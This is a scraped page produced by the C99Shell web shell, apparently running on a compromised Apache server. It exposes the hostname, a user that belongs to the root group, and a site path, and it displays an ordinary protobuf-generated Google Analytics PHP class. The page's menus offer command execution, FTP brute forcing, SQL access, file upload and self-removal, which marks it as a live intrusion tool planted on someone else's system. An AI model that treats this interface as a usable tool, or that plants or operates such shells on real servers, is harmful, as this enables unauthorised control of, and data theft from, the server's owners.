!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/google/analytics-data/src/V1beta/   drwxr-xr-x
Free 29.13 GB of 117.98 GB (24.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     NumericValue.php (2.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: google/analytics/data/v1beta/data.proto

namespace Google\Analytics\Data\V1beta;

use 
Google\Protobuf\Internal\GPBType;
use 
Google\Protobuf\Internal\RepeatedField;
use 
Google\Protobuf\Internal\GPBUtil;

/**
 * To represent a number.
 *
 * Generated from protobuf message <code>google.analytics.data.v1beta.NumericValue</code>
 */
class NumericValue extends \Google\Protobuf\Internal\Message
{
    protected 
$one_value;

    
/**
     * Constructor.
     *
     * @param array $data {
     *     Optional. Data for populating the Message object.
     *
     *     @type int|string $int64_value
     *           Integer value
     *     @type float $double_value
     *           Double value
     * }
     */
    
public function __construct($data NULL) {
        
\GPBMetadata\Google\Analytics\Data\V1Beta\Data::initOnce();
        
parent::__construct($data);
    }

    
/**
     * Integer value
     *
     * Generated from protobuf field <code>int64 int64_value = 1;</code>
     * @return int|string
     */
    
public function getInt64Value()
    {
        return 
$this->readOneof(1);
    }

    public function 
hasInt64Value()
    {
        return 
$this->hasOneof(1);
    }

    
/**
     * Integer value
     *
     * Generated from protobuf field <code>int64 int64_value = 1;</code>
     * @param int|string $var
     * @return $this
     */
    
public function setInt64Value($var)
    {
        
GPBUtil::checkInt64($var);
        
$this->writeOneof(1$var);

        return 
$this;
    }

    
/**
     * Double value
     *
     * Generated from protobuf field <code>double double_value = 2;</code>
     * @return float
     */
    
public function getDoubleValue()
    {
        return 
$this->readOneof(2);
    }

    public function 
hasDoubleValue()
    {
        return 
$this->hasOneof(2);
    }

    
/**
     * Double value
     *
     * Generated from protobuf field <code>double double_value = 2;</code>
     * @param float $var
     * @return $this
     */
    
public function setDoubleValue($var)
    {
        
GPBUtil::checkDouble($var);
        
$this->writeOneof(2$var);

        return 
$this;
    }

    
/**
     * @return string
     */
    
public function getOneValue()
    {
        return 
$this->whichOneof("one_value");
    }

}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--